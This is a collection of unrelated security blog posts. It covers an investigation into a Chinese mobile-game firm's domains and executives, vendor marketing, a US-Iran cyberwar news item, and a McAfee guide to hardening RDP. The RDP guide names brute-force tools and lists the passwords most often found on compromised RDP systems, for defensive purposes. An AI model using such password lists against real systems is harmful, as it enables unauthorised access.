52gzone[.]com 2012-11-26 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
91gzonep[.]com 2012-11-26 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
blazefire[.]com 2000-08-24 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
blazefire[.]net 2010-11-22 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
hsuheng[.]com 2015-03-09 GODADDY.COM, LLC
jyhxz.net 2013-07-02 —
longmen[.]com 1998-06-19 GODADDY.COM, LLC
longmenbiaoju[.]com 2012-12-09 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
oppayment[.]com 2013-10-09 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD
tongjue[.]net 2014-01-20 ALIBABA CLOUD COMPUTING (BEIJING) CO., LTD

Following the breadcrumbs from some of the above domains we can see that “Blazefire” is a sprawling entity with multiple business units and names. For example, 2333youxi[.]com is the domain name for Shanghai Qianyou Network Technology Co., Ltd., a firm that says it is “dedicated to the development and operation of Internet mobile games.”

Like the domain blazefire[.]com, 2333youxi[.]com also was initially registered to tosaka1027@gmail.com and soon changed to Shanghai Blazefire as the owner.

The offices of Shanghai Quianyou Network — at Room 344, 6th Floor, Building 10, No. 196, Ouyang Rd, Shanghai, China — are just down the hall from Shanghai Wildfire Network Technology Co., Ltd., reportedly at Room 35, 6th Floor, Building 10, No. 196, Ouyang Rd, Shanghai.

The domain tongjue[.]net is the Web site for Shanghai Bronze Network Technology Co., Ltd., which appears to be either another name for or a sister company to Shanghai Tongjue Network Technology Co., Ltd.  According to its marketing literature, Shanghai Tongjue is situated one door down from the above-mentioned Shanghai Quianyou Network — at Room 36, 6th Floor, Building 10, No. 196, Ouyang Road.

“It has developed into a large domestic wireless Internet network application,” reads a help wanted ad published by Tongjue in 2016.  “The company is mainly engaged in mobile phone pre-installation business.”

That particular help wanted ad was for a “client software development” role at Tongjue. The ad said the ideal candidate for the position would have experience with “Windows Trojan, Virus or Game Plug-ins.” Among the responsibilities for this position were:

-Crack the restrictions imposed by the manufacturer on the mobile phone.
-Research and master the android [operating] system
-Reverse the root software to study the root of the android mobile phone
-Research the anti-brushing and provide anti-reverse brushing scheme

WHO IS BLAZEFIRE/YEHUO?

Many of the domains mentioned above have somewhere in their registration history the name “Hsu Heng” and the email address yehuo@blazefire.net. Based on an analysis via cyber intelligence firm 4iq.com of passwords and email addresses exposed in multiple data breaches in years past, the head of Blazefire goes by the nickname “Hagen” or “Haagen” and uses the email “chuda@blazefire.net“.

Searching on the phrase “chuda” in Mandarin turns up a 2016 story at the Chinese gaming industry news site Youxiguancha.com that features numerous photos of Blazefire employees and their offices. That story also refers to the co-founder and CEO of Blazefire variously as “Chuda” and “Chu da”.

“Wildfire CEO Chuda is a tear-resistant boss with both sports (Barcelona hardcore fans) and literary genre (playing a good guitar),” the story gushes. “With the performance of leading the wildfire team and the wildfire product line in 2015, Chu has won the top ten new CEO awards from the first Black Rock Award of the Hardcore Alliance.”

Interestingly, the registrant name “Chu Da” shows up in the historical domain name records for longmen[.]com, perhaps Shanghai Wildfire’s oldest and most successful mobile game ever. That record, from April 2015, lists Chu Da’s email address as yehuo@blazefire.com.

The CEO of Wildfire/Blazefire, referred to only as “Chuda” or “Hagen.”

It’s not clear if Chuda is all or part of the CEO’s real name, or just a nickname; the vice president of the company lists their name simply as “Hua Wei,” which could be a real name or a pseudonymous nod to the embattled Chinese telecom giant by the same name.

According to this cached document from Chinese business lookup service TianYanCha.com, Chuda also is a senior executive at six other companies.

Google declined to elaborate on its blog post. Shanghai Wildfire did not respond to multiple requests for comment.

It’s perhaps worth noting that while Google may be wise to what’s cooking over at Shanghai Blazefire/Wildfire Network Technology Co., Apple still has several of the company’s apps available for download from the iTunes store, as well as others from Shanghai Qianyou Network Technology.

Endpoint’s Role in Enterprise Data Protection

Data is a big deal. As the foundation of a modern-day business, data drives organizations’ everyday operations. It provides insights, indicates trends, and informs business decisions. This means securing an organization’s data is of the utmost importance, especially when it comes to defending against attacks emerging out of today’s threat landscape. And though there are standards that have been published to protect customer data and data context, these rules are still incomplete and imperfect, given any published best practice that works for organizations may also create immediate targets for an attacker to bypass. Let’s examine some key threats that compromise enterprise data, and the role endpoint security plays in safeguarding that information.

Means to an End

For many cybercriminals, data is the end goal and endpoint devices are the avenue for getting there. Whether it’s through a compromised app, credential theft, malware, ransomware, or a phishing attack – cyberattacks are consistently testing enterprises in an attempt to find a weakness. That’s because the endpoint acts as the ultimate gateway to critical enterprise data. If compromised, it could cause ripple effects on an organization’s day-to-day functions, causing downtime or a longer attack dwell time, permitting cybercriminals to harvest more sensitive data.

The good news? Doors work both ways. Just as endpoints can create gateways to important data, they can also stop cybercrime in its tracks, if properly secured.

Keeping the Door Locked

The best option for safeguarding your data is securing it at the start – the endpoint. By implementing agile and adaptive endpoint security on every device in your organization, enterprises can ensure data stays locked down. The key is leveraging endpoint solutions that go beyond the more traditional deterministic security feature like anti-malware and include predictive technology like artificial intelligence (AI) and machine learning (ML). This type of technology can quickly sift through security incidents in order to identify the real threats posed to endpoint devices, which helps security teams automatically reduce the time required to address threats. Security teams should also ensure they leverage endpoint security solutions that provide increased, centralized visibility into all of their organization’s devices. This kind of visibility is crucial for not only rapid detection, but also to ensure user behavior is being tracked and policies are being enforced.

For security teams aiming to stop modern-day cyberthreats at the start, adopt security solutions such as McAfee MVISION Mobile and McAfee MVISION Endpoint, which have machine learning algorithms and analysis built into their architecture to help identify malicious behavior and attack patterns affecting endpoint devices. To add to that, teams should also leverage solutions such as McAfee DLP Endpoint, which empowers IT staff with increased visibility, giving them knowledge of what all their users are doing at all times.  With this kind of technology in play, enterprise data won’t be anyone else’s business other than the organization it belongs to.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business.

The post Endpoint’s Role in Enterprise Data Protection appeared first on McAfee Blogs.

US-Iran Cyberwar Heats Up

President Trump has authorized a round of cyber attacks against Iran, and U.S. companies and agencies are bracing for counter attacks.

The Washington Post reported that the U.S. cyberattack had disabled Iranian missile control systems. The attack was the latest in escalating tensions between the two countries, which includes the recent downing of an unmanned surveillance drone. 

“This operation imposes costs on the growing Iranian cyberthreat, but also serves to defend the United States Navy and shipping operations in the Strait of Hormuz,” said former senior White House cybersecurity official Thomas Bossert.

The Department of Homeland Security Cybersecurity and Infrastructure Agency (CISA) issued an alert warning organizations of potential retaliation from Iranian hackers, including the deployment of “wiper” malware that deletes data from targeted computers and networks. 

“Iranian regime actors and proxies are increasingly using destructive ‘wiper’ attacks, looking to do much more than just steal data and money,” said CISA director Christopher Krebs 

Cyber warfare is in addition to what the U.S. government has called “kinetic” actions, i.e. more traditional military operations. Earlier this month, the U.S. Cyber Command reportedly deployed offensive malware against Russia’s electrical grid.

The post US-Iran Cyberwar Heats Up appeared first on Adam Levin.

Veracode to showcase DevSecOps solutions at inaugural AWS re:Inforce

Developers and security professionals from around the world are descending on Boston this week to attend the first AWS security conference, re:Inforce, for what promises to be one of the most exciting events in recent memory in the industry.

As a pioneer of application security that is helping educate both security and dev teams in building more secure code, Veracode is proud to be a platinum sponsor of AWS re:Inforce here in Boston, a world renowned hub of cybersecurity innovation.

With so many security conferences taking place throughout the year around the world, and with more companies entering the market and crowding niches, it can have a dizzying effect for companies buying security solutions.

What makes AWS re:Inforce different?

Companies seeking to change the world are using software to push entire industries forward with new advancements, better insights and greater efficiencies. At the same time, new threat vectors appear, and new languages and frameworks change how we create software, causing cyberattacks to evolve and become more sophisticated. The security of software is just as critical as the function of the software itself. But, if the software you are developing or buying is insecure, you can’t achieve your vision – no matter how important or innovative it is.

Two movements that are allowing innovation and security to evolve in harmony – the shift to cloud-native solutions and the evolution of DevSecOps – will be on full display at AWS re:Inforce. That’s because we’ve moved from a world where applications were only run in the cloud to one where they are written and live in the cloud throughout their lifecycle. As a result, we are experiencing a dramatic increase in scan frequency and our customers are adopting application security practices earlier in their continuous integration pipeline. More frequent, incremental scans in the SDLC – a pillar of DevSecOps – allow companies to fix flaws more than 11 times more quickly than the typical organization. Fundamentally, when a company’s applications are more secure and their development teams are not slowed down by security, they achieve a competitive advantage.

Veracode is evolving its SaaS architecture by leveraging the power of AWS to better meet increased demand for DevSecOps practices from customers. Development teams are looking for fast, accurate application security tools integrated directly into their CI/CD work cycles. Veracode processes an average of more than 400,000 scans per month for customers around the world, and companies expect fast scan times and the ability to rapidly scale their volume of scanning given that developers scan at every code check in. Veracode’s combination of technology, expertise, and services backed by AWS cloud services helps organizations more effectively find and fix the vulnerabilities in their software.

Veracode has also achieved Advanced Technology Partner Status in the AWS Partner Network (APN). This achievement is the highest tier within the AWS Partner Network. It recognizes a rigorous qualification process that includes AWS technical certification and validation with a wide range of customer references. The technical certification included an extensive review of the Veracode architecture leveraging AWS services against AWS published best practices and benchmarks for security, scalability and availability.

At AWS re:Inforce, attendees can visit the Veracode booth (#813) to learn more about the company’s application security testing platform, get a Veracode t-shirt and participate in an interactive experience designed to test developers’ secure programming knowledge.

On the evening of Tuesday, June 25, Veracode is hosting a “Conquer the Cloud” afterparty at City Tap House in Boston. Securing the cloud takes a tribe of AppSec heroes, and we’d love your tribe to meet ours over beers, games, and live music during AWS re:Inforce. Take a moment to register here.

Finally, don’t miss a presentation at re:Inforce by John Maski, Veracode Application Security Consultant and former director of DevSecOps at AT&T, titled “Integrating AppSec Into Your DevSecOps on AWS.” John will describe securing CI/CD pipelines in enterprise environments and “shifting left” with security. This talk is taking place at 10:15 am, Wed., June 26 in the Solutions Theater.

Streaming Safer Means Streaming Legally

Reading Time: ~ 2 min.

It’s been more than a decade since Netflix launched its on-demand online streaming service, drastically changing the way we consume media. In 2019, streaming accounts for an astonishing 58 percent of all internet traffic, with Netflix alone claiming a 15 percent share of that use. But as streaming has become more common, so has the exploitation of streaming technologies. Some consumers stream illegally to cut costs, perceiving it to be a victimless crime. But as the saying goes: there’s no such thing as a free lunch. Streaming is no exception.

Jailbreak!

By downloading illegal streaming apps from third-party sources (i.e. outside of the Apple® App Store or Google™ Play), users may think they’re capitalizing on a clever loophole to access free services. However, according to a startling study conducted by Digital Citizens, 44 percent of households using pirated streaming services experienced a cybersecurity breach of one or more of their devices. That means if you use any type of illegal streaming device or app, you are six times more likely to fall victim to a cybersecurity attack than households using legal streaming services. Since a reported 12 million homes—in North America alone) are actively using pirated streams, that means illegal streaming may have led to up to 5 million potentially undetected breaches.

Why are illegal streams so attractive to cybercriminals? Because you’re probably streaming using devices and applications that are connected to your home network. Unfortunately, the firewall on the average home router does not provide adequate security against attacks. Any malware introduced by the streaming software is likely able to get through successfully. If you’re using a Window® computer or device, that means the malware can infiltrate not the device you’re actively using, but also any other Windows devices using the same internet connection. By spreading itself across multiple devices, malware makes its own removal that much more difficult. Pair these details with the fact that illegal streaming users are less likely to report a malicious app, illegal streams provide a haven for cybercriminals in which they can easily attack users, infect their machines, steal their data, and hold their files for ransom.  

Cybersecurity breaches caused by illegal streaming can manifest in many ways. For example, a popular illegal movie and live sports streaming app was observed scraping the connected WiFi name and password, as well as other sensitive information, according to ThreatPost.

How You Can Stream Safer

Ultimately, nobody can guarantee the security of an illegal stream. The truth is that legal streaming is the only safer streaming. That doesn’t mean you have to go through the giants, like Netflix or Hulu. Users can now access many low-cost, legal streaming options—including a few that are ad-supported and are actually free. So why put yourself and your family at risk for the sake of an illegal stream?

If you’re worried that someone with access to your WiFi network may be streaming illegally, thereby putting you and your devices in danger, make sure all of your devices are using up-to-date antivirus software to help stop cyberattacks and prevent malware infections. More importantly, talk with your family and friends about the real cost of “free” streaming. They’ll be more cautious once they fully understand the risks.


Looking for more home security education? Check out our Home + Mobile playlist on YouTube.


The post Streaming Safer Means Streaming Legally appeared first on Webroot Blog.

BH Consulting in the media: supply chain security still a concern

The Huawei controversy has raised fundamental questions around supply chain security, Brian Honan has told Infosecurity Magazine. In a video interview recorded at Infosecurity Europe 2019 conference in London, BH Consulting’s CEO said the issue of technology containing alleged backdoors to enable spying has led to “interesting conversations” in the security community.

The question boils down to whether it’s possible to build secure systems if there’s no trust in the technology platform they’re built upon, Brian said. “Unless we actually build something ourselves from absolute scratch, we are relying on third parties, and how much trust can we give to those third parties? So the bigger issue becomes: how you secure your supply chain?”

For security professionals, securing their company’s supply chain needs a more rigorous due diligence process than asking vendors whether they have antivirus software on their PCs. It’s about “asking the right questions into the right levels, and digging deep into the technology, depending on what your requirements are,” Brian said.

Huawei to the danger zone

Noting the accusations that Huawei technology has security bugs, Brian said that the same is true of products from many other places including the US, UK or Europe. “There’s no such thing as 100% secure systems. Take the Intel chips that we have in all our servers: they have security bugs in them,” he said.

Emphasising that he wasn’t trying to defend Huawei, Brian said: “A lot of what we’re reading in the press and the media, there’s nothing to substantiate the claims behind it.” The larger question about whether any bugs are accidental, or deliberately placed backdoors that allow Government-level spying, is “outside the remit of our industry,” he said.

The chain

Even if a security professional decided not to use a certain brand of equipment in their network, there’s a question of what happens when their information travels elsewhere within their company’s external supply chain, or through its internet service provider. Instead, infosec professionals should focus on protecting information at rest or in transit, since the early internet engineers designed it to share information, not keep it secret. “We have been trying to build security on top of a very unsafe foundation. We need to look at ways of how we keep our data safe, no matter where it goes or how far it travels,” Brian said.

As for what’s next in security, Brian said regulations will stay at the forefront over the next year. “GDPR isn’t over. GDPR is the evolution of data protection laws that we had already… the regulations are still being enforced. We still have to continue looking after GDPR.”  Some of the earliest court cases relating to GDPR are due to conclude soon, with potentially large fines for offenders. He also said Brexit is “the elephant in the room”, given how it could affect the way that European companies deal with UK businesses, and vice versa.

Toys in the attic

The ePrivacy Regulation (ePR) will have a huge say in how companies embed cookies on their websites and how they communicate and market to customers. Regulations like the EU Cybersecurity Act look set to impose rules on IoT or ‘smart’ devices. Their security – or lack of it – has long been a thorny issue. Brian recently commented on this issue in an article for the Irish Times about smart toys and we’ve also blogged about it before on Security Watch.

Summing up the likely short-term developments in security, Brian said: “A lot of things in the next 12-24 months are going to have a big impact on our industry, and it’s where the regulators are going to play catch-up on the technology. It’s going to be interesting to see how those two worlds collide.” You can watch the 15-minute video here (free, but sign-in required).

Panel discussion at Infosecurity Europe 2019. From left: Peter Brown, Group Manager Technology Policy, UK ICO; Steve Wright, GDPR & CISO Advisor, Bank of England; Titta Tajwe, CISO, News UK; Deborah Haworth, Penguin Random House UK; and panel moderator Brian Honan, CEO of BH Consulting

Regulate

Also during Infosecurity Europe, Brian moderated a debate on dealing with complex regulations while ensuring privacy, security and compliance. It featured with data protection and security practitioners from the Bank of England, Penguin Random House UK, News UK and the UK Information Commissioner’s Office. Bank Info Security has a good writeup of some of the talking points. Its report noted that Brian focused the discussion on the broader regulatory landscape, including the updated EU ePrivacy Directive, while panellists and audience questions kept returning to GDPR.

The article noted how the panelists broadly agreed that regulations, including GDPR, helped to improve their organisation’s security posture. It quoted Titta Tajwe, CISO of News UK, who said: “With the EU GDPR, it really helped for executives to understand what needs to happen to protect the data of your customers. So it did allow the CISOs to get the budget they needed to do the work they’d already been asking for, for a long, long time.”

Photos used with kind permission of Mathew Schwartz.

The post BH Consulting in the media: supply chain security still a concern appeared first on BH Consulting.

RDP Security Explained

RDP on the Radar

Recently, McAfee released a blog related to the wormable RDP vulnerability referred to as CVE-2019-0708 or “Bluekeep.” The blog highlights a particular vulnerability in RDP which was deemed critical by Microsoft due to the fact that it exploitable over a network connection without authentication. These attributes make it particularly ‘wormable’ – it can easily be coded to spread itself by reaching out to other accessible networked hosts, similar to the famous EternalBlue exploit of 2017. This seems particularly relevant when (at the time of writing) 3,865,098 instances of port 3389 are showing as open on Shodan.

Prior to this, RDP was already on our radar. Last July, McAfee ATR did a deep dive on Remote Desktop Protocol (RDP) marketplaces and described the sheer ease with which cybercriminals can obtain access to a large variety of computer systems, some of which are very sensitive. One of the methods of RDP misuse that we discussed was how it could aid deploying a targeted ransomware campaign. At that time one of the most prolific targeted ransomware groups was SamSam. To gain an initial foothold on its victims’ networks, SamSam would often rely on weakly protected RDP access. From its RDP launchpad, it would proceed to move laterally through a victim’s network, successfully exploiting and discovering additional weaknesses, for instance in a company’s Active Directory (AD).

In November 2018, the FBI and the Justice department indicted two Iranian men for developing and spreading the SamSam ransomware extorting hospitals, municipalities and public institutions, causing over $30 million in losses. Unfortunately, this did not stop other cybercriminals from using similar tactics, techniques and procedures (TTPs).

The sheer number of vulnerable systems in the wild make it a “target” rich environment for cybercriminals.

In the beginning of 2019 we dedicated several blogs to the Ryuk ransomware family that has been using RDP as an initial entry vector. Even though RDP misuse has been around for many years, it does seem to have gained an increased popularity amongst criminals focused on targeted ransomware.

Recent statistics showed that RDP is the most dominant attack vector, being used in 63.5% of disclosed targeted ransomware campaigns in Q1 of 2019.

Source: Coveware Q1 statistics

Securing RDP

Given the dire circumstances highlighted above it is wise to question if externally accessible RDP is an absolute necessity for any organization. It is also wise to consider how to better secure RDP if you are absolutely reliant on it. The good news is there are several easy steps that help an organization to better secure RDP access.

That is why, in this blog, we will use the adversarial knowledge from the McAfee ATR red team to explain what easy measures can be undertaken to harden RDP access.

Recommendations are additional to standard systems hygiene which should be carried out for all systems (although it becomes more important for Internet connected hosts), such as keeping all software up-to-date, and we intentionally avoid ‘security through obscurity’ items such as changing the RDP port number.

Do not allow RDP connections over the open Internet

To be very clear… RDP should never be open to the Internet. The internet is continuously being scanned for open port 3389 (the default RDP port). Even with a complex password policy and multi-factor authentication you can be vulnerable to denial of service and user account lockout. A much safer alternative is to use a Virtual Private Network (VPN). A VPN will allow a remote user to securely access their corporate network without exposing their computer to the entire Internet. The connection is mutually encrypted, providing authentication for both client and server, preferably using a dual factor, while creating a secure tunnel to the corporate network. As you only have access to the network you will still need to RDP to the computer but can do so more securely without exposing it to the internet.

Use Complex Passwords

An often-used alternative acronym for RDP is “Really Dumb Passwords.” That short phrase encapsulates the number one vulnerability of RDP systems, simply by scanning the internet for systems that accept RDP connections and launching a brute-force attack with popular tools such as, ForcerX, NLBrute, Hydra or RDP Forcer to gain access.

Using complex passwords will make brute-force RDP attacks harder to succeed.

Below are the top 15 passwords used on vulnerable RDP systems. We built this list based on information on weak passwords shared by a friendly Law Enforcement Agency from taken down RDP shops. What is most shocking is the fact that there is such a large number of vulnerable RDP systems did not even have a password.

The TOP 15 used passwords on vulnerable RDP systems

[no password]
123456
P@ssw0rd
123
Password1
1234
password
1
12345
Password123
admin
test
test123
Welcome1
scan

Use Multi-Factor Authentication

In addition to a complex password, it is best practice use multi-factor authentication. Even with great care and diligence, a username and password can still be compromised. If legitimate credentials have been compromised, multi-factor authentication adds an additional layer of protection by requiring the user to provide a security token, e.g. a code received by notification or a biometric verification. Better yet, a FIDO based authentication device can provide an extra factor which is not vulnerable to spoofing attacks, in a similar fashion to other one-time-password (OTP) mechanisms. This increases the difficulty for an unauthorized person to gain access to the computing device.

Use an RDP Gateway

Recent versions of Windows Server provide an RDP gateway server. This provides one external interface to many internal RDP endpoints, thus simplifying management, including many of the items outlined in the following recommendations. These comprise of logging, TLS certificates, authentication to the end device without actually exposing it to the Internet, authorization to internal host and user restrictions, etc.

Microsoft provides detailed instructions for configuration of remote desktop gateway server, for Windows Server 2008 R2 as an example, over here.

Lock out users and block or timeout IPs that have too many failed logon attempts

A high number of failed logon attempts is a strong indication of a brute force attack. Limiting the number of logon attempts per user can prevent such attacks. A failed logon attempt is logged under Windows Event ID 4625. An RDP logon falls under logon type 10, RemoteInteractive. The account lockout threshold can be specified in the local group policy under security settings: Account Policies.

For logging purposes, it is best to log both failed and successful logons. Additionally, it is important to note that “specific security layer for RDP connections” needs to be enabled. Otherwise, you will be unable to tell that the logon attempt came over RDP or see the source IP address. A comparison is shown below.

Event log network logon (type 3) note no source network address

Event log RDP logon (type 10) note the source network address present

Use a Firewall to restrict access

Firewall rules can be created to restrict Remote Desktop access so that only a specific IP address or a range of IP addresses can access a given device. This can be achieved by simply opening “Windows Firewall with Advanced Security,” clicking on Inbound Rules and scrolling down to the RDP rule. A screen shot can be seen below.

Firewall settings for inbound RDP connections 

Enable Restricted Admin Mode

When connecting to a remote machine via RDP, credentials are stored on that machine and may be retrievable by other users of the systems (e.g. malicious attackers). Microsoft has added restricted admin mode which instructs the RDP server not to store credentials of users who log in. Behind the scenes, the server now uses ‘network’ login rather than ‘interactive’ and therefore uses hashes or Kerberos tickets rather than passwords for authentication. Assessment of the pros and cons of this option are recommended before enabling in your environment. On the negative side, the use of network login exposes the possibility of credential reuse (pass the hash) attacks against the RDP server. Pass the hash is likely possible anyway, internally, via other exposed ports so may not significantly increase exposure there, but when including this option to Internet servers, where other ports are likely (and should be!) restricted, pass the hash is then extended to the Internet. Given the pros and cons, avoiding internal escalation of privilege is often prioritized and therefore restricted admin mode is enabled.

Microsoft TechNet describes configuration and usage of restricted mode here.

Encryption

There are four levels of encryption supported by standard RDP: Low, Client Compatible, High, and FIPS Compliant. This is configured on the Remote Desktop server. This can be further improved upon by using Enhanced RDP Security. When Enhanced RDP security is used, encryption and server authentication are implemented by external security protocols, e.g. TLS or CredSSP. One of the key benefits of Enhanced RDP Security is that it enables the use of Network Level Authentication (NLA) when using CredSSP as the external security protocol.

Certificate management is always a complexity, but Microsoft does provide this through the use of Active Directory Certificate Services (ADCS). Certificates can be pushed using Group Policy Objects (GPO) where this is available. Incompatible operating system environments must import certificates via the web interface exposed at https://<server>/Certsrv.

Enable Network Level Authentication (NLA)

To reduce the amount of initially required server resources, and thereby mitigate against denial of service attacks, network level authentication (NLA) can be used. Within this mode, strong authentication takes place before the remote desktop connection is established, using the Credential Security Support Provider (CredSSP) either through TLS or Kerberos. NLA can also help to protect against man-in-the-middle attacks, where credentials are intercepted. However, be aware that NLA over NTLM does not provide strong authentication and should be disabled in favor of NLA over TLS (with valid certificates).

Microsoft TechNet describes configuration and usage of NLA in Windows Server 2008 R2 here.

Interestingly, BlueKeep, mentioned above, is partially mitigated by having NLA enabled. As reported by Microsoft in the associated advisory “With NLA turned on, an attacker would first need to authenticate to Remote Desktop Services using a valid account on the target system before the attacker could exploit the vulnerability.”

Restrict users who can logon using RDP

All administrators can use RDP by default. Remote access should be limited to only the accounts that require it. If all administrators do not need remote access you should consider removing the Administrator account from the RDP access group. You can then add the specific users which require access to the “Remote Desktop Users” group. See here for more information on managing users in your RDS collection.

Minimize the Number of Local Administrator Accounts

Local administrator accounts provide an attack vector for attackers who gain access to a system. Credentials can be cracked offline and more accounts means more likelihood of a successful crack. Therefore, you should aim for a maximum of one local administrator account which is secured appropriately.

Ensure that Local Administrator Accounts are Unique

If the local administrator accounts match those assigned to their counterparts on other systems within the server’s internal network, the attacker can potentially re-use credentials to move laterally. This issue occurs quite frequently, so Microsoft provided Local Administrator Password Solution (LAPS) as a means to avoid this scenario across the organization with central management of unique local administrator credentials. This is particularly relevant for externally exposed systems.

Microsoft provides a download and usage information for LAPS here.

Limit Domain Administrator Account Access

Accounts within the domain admins group have full control of the domain by default, by virtue of being part of the administrators group for all domain controllers, domain workstations and domain member servers. If a credential for a domain admin account is retrieved from the RDP server, the attacker now holds the ‘keys to the kingdom’ and is in full control of the entire domain. You should reduce the amount of domain administrators within the organization in general and avoid accessing the RDP server or other externally exposed systems via these accounts, to avoid inadvertently making credentials accessible.

In general, ‘least privilege’ administration models should be used. Microsoft provides guidance in this area, including how best to use domain admin accounts, here.

Consider Placement Within the Network

Where possible, RDP servers should be placed within a DMZ or other restricted area of the network. The idea here is that if an attack is successful, its scope is reduced and confined to the RDP server alone. Often RDP is exposed specifically to allow external users onto the network, so this may not be a feasible solution, however it should be considered and the quantity of services reachable within the internal network should be minimized.

Consider using an account-naming convention that does not reveal organizational information

There are many options for account naming conventions, ranging from firstname.lastname to not deriving usernames from name data; all having their pros and cons. However, some of the more commonly used account naming conventions such as firstname.lastname, make it very easy to guess usernames and email addresses. This can be a security concern as spammers and hackers will readily use this information.

Conclusion

When trying to run an efficient IT organization, having remote access to certain computer systems might be essential. Unfortunately, when not implemented correctly, the tools that make remote access possible also open your systems up to unwanted guests. In the last few years there have been far too many examples of where vulnerable RDP access gave way to a full-scale network compromise.

In this article we have shown that RDP access can be hardened with some easy steps. Please take the time to review your RDP security posture.

The post RDP Security Explained appeared first on McAfee Blogs.

5 principles driving a customer-obsessed identity strategy at Microsoft

The cloud era has fundamentally changed the way businesses must think about security. For a long time, we built security around the perimeter. But today, the boundaryless landscape demands that we start with the individual.

In our journey with customers co-designing our products and services, Microsoft has learned that our identity solutions need to do more than just support employee productivity. We have to take things further to ensure our solutions empower our customers to work more closely with their business partners and nurture deeper relationships with their customers, who want help not just securing their personal information, but also protecting their privacy. The problems our customers need to solve, and the scenarios they want enabled for the future, have shaped the design principles guiding our identity strategy.

Embrace open standards

The world of cloud and devices is inherently heterogenous. Our customers, their partners, and their customers will use many devices, apps, and services from many different vendors. The complexity of managing and securing such a mixed environment could be overwhelming if not for open standards. For example, OAuth 2.0, OIDC, and SAML enable single sign-on across apps and clouds from multiple vendors, SCIM enables automated user provisioning, and the new standards from the FIDO alliance make signing in more secure. This is why every API and protocol Azure AD supports is based on open standards and why Microsoft is actively engaged in all the major identity standards bodies.

Offer industry-leading security

Our goal is to create an identity system that’s secure and private from the ground up. This means blocking every avenue of attack that we can. Enabling MFA reduces credential-based security breaches by more than 99 percent, but there’s still risk from people mishandling their passwords or getting tricked into handing them over. Adopting FIDO with the recently ratified WebAuthN standard makes it possible to eliminate passwords altogether, replacing them with a biometric device or a phone. If you have a Microsoft Account, you can go passwordless today. Soon, passwordless sign-in will be an option on every Microsoft platform and application, as well as for third party applications that integrate with Azure AD.

We now put the full power of the cloud behind every authentication request. Using Azure AD Conditional Access as a starting point, organizations can implement a Zero Trust security strategy that examines not only the identity of the user, but also the type and health of their device, the properties and reputation of the network they’re connecting from, the app they’re using, and the sensitivity of the data they’re trying to access. This not only makes security stronger, it also improves the user experience. For example, we can employ cloud-scale machine learning algorithms, which process trillions of signals daily, to learn each user’s common behavioral patterns and flag authentication attempts that are abnormal or high risk. This way, policies invoke MFA or other additional measures only when necessary, making the experience less interruptive to users.

Make governance easier and more automatic

Implementing strong governance strengthens security guardrails, but most customers find the task daunting. Granting access is easy. Remembering months later to remove access for each person who may have changed roles is not. Identity systems should make it easier to assign the right access to the right people, for example, by automating user access provisioning and deprovisioning based on a user role, location, and business unit. It should be easier for employees and partners to request access when they need it. And most importantly, the system should prompt administrators to review access permissions on a regular cadence or when people change roles. And all of these processes should be driven and informed by world class machine learning and AI which constantly monitor for unusual patterns and unrecognized risks.

Deliver a comprehensive solution, not building blocks

One of the key things we’ve learned from our enterprise customers is that they’re sick and tired of cobbling together identity solutions based on mix and match sets of identity building blocks acquired from a myriad of vendors. They want a holistic solution that supports all their applications and all their different identities while giving them security and control without the gaps that inevitably occur when multiple point solutions are patched together. We’ll do this by delivering a completely integrated identity and access management suite that gives them a single place to go to manage—and protect—all identities, whether they belong to employees, business partners, or customers and all of the resources, they need to access.

Give people control over their information

A holistic solution that accepts identities people bring with them is a necessary prerequisite to the vision of decentralized identity. Microsoft believes everyone has the right to own and control their digital identity—one that securely and privately stores all personal data. To achieve this vision, we need to augment existing cloud identity systems with one that individuals, organizations, and devices can own so they can control their digital identity and data. We believe a standards-based decentralized identity system can unlock a new set of experiences that empowers users and organizations to have greater control over their data—and deliver a higher degree of trust and security.

Taking the next step

Everyone in the identity division at Microsoft is passionately committed to ensuring the systems we build empower people to do their best work and live their best lives.

If one thing is clear, though, these identity initiatives are a journey. Over the coming months, we’ll invite you to participate in a series of technology previews, where your feedback will help shape how identity services will take us closer to a world without passwords, where organizations can easily manage and secure complex environments, and individuals can worry less and stop making trade-offs among ease of use, privacy, and security. Working together as an industry, we’re building a better path to security and privacy, anchored around the one constant in this fast-moving, heterogenous world—you.

The post 5 principles driving a customer-obsessed identity strategy at Microsoft appeared first on Microsoft Security.

Getting Started with Local Security Groups

For several months we have been profiling experienced security practitioners as well as those still getting started. Our reasoning is simple - there is no one surefire way to gain the experience and knowledge necessary to thrive in the world of cybersecurity. Nearly everyone has a different path - some are PhDs while others barely made it out of high school. Some had deeply technical backgrounds while others stumbled into security out of pure curiosity. Even with the lack of a defined path, we’re hoping that these profiles help individuals figure out the best path for them.

Inside out: Get to know the advanced technologies at the core of Microsoft Defender ATP next generation protection

While Windows Defender Antivirus makes catching 5 billion threats on devices every month look easy, multiple advanced detection and prevention technologies work under the hood to make this happen.

Windows Defender Antivirus is the next-generation protection component of Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP), Microsoft’s unified endpoint security platform. Much like how Microsoft Defender ATP integrates multiple capabilities to address the complex security challenges in modern enterprises, Windows Defender Antivirus uses multiple engines to detect and stop a wide range of threats and attacker techniques at multiple points.

These next-generation protection engines provide industry-best detection and blocking capabilities. Many of these engines are built into the client and provide advanced protection against majority of threats in real-time. When the client encounters unknown threats, it sends metadata or the file itself to the cloud protection service, where more advanced protections examine new threats on the fly and integrate signals from multiple sources.

These next-generation protection engines ensure that protection is:

  • Accurate: Threats both common and sophisticated, a lot of which are designed to try and slip through protections, are detected and blocked
  • Real-time: Threats are prevented from getting on to devices, stopped in real-time at first sight, or detected and remediated in the least possible time (typically within a few milliseconds)
  • Intelligent: Through the power of the cloud, machine learning (ML), and Microsoft’s industry-leading optics, protection is enriched and made even more effective against new and unknown threats

My team continuously enhances each of these engines to be increasingly effective at catching the latest strains of malware and attack methods. These enhancements show up in consistent top scores in industry tests, but more importantly, translate to threats and malware outbreaks stopped and more customers protected.

Here’s a rundown of the many components of the next generation protection capabilities in Microsoft Defender ATP:

In the cloud:

  • Metadata-based ML engine – Specialized ML models, which include file type-specific models, feature-specific models, and adversary-hardened monotonic models, analyze a featurized description of suspicious files sent by the client. Stacked ensemble classifiers combine results from these models to make a real-time verdict to allow or block files pre-execution.
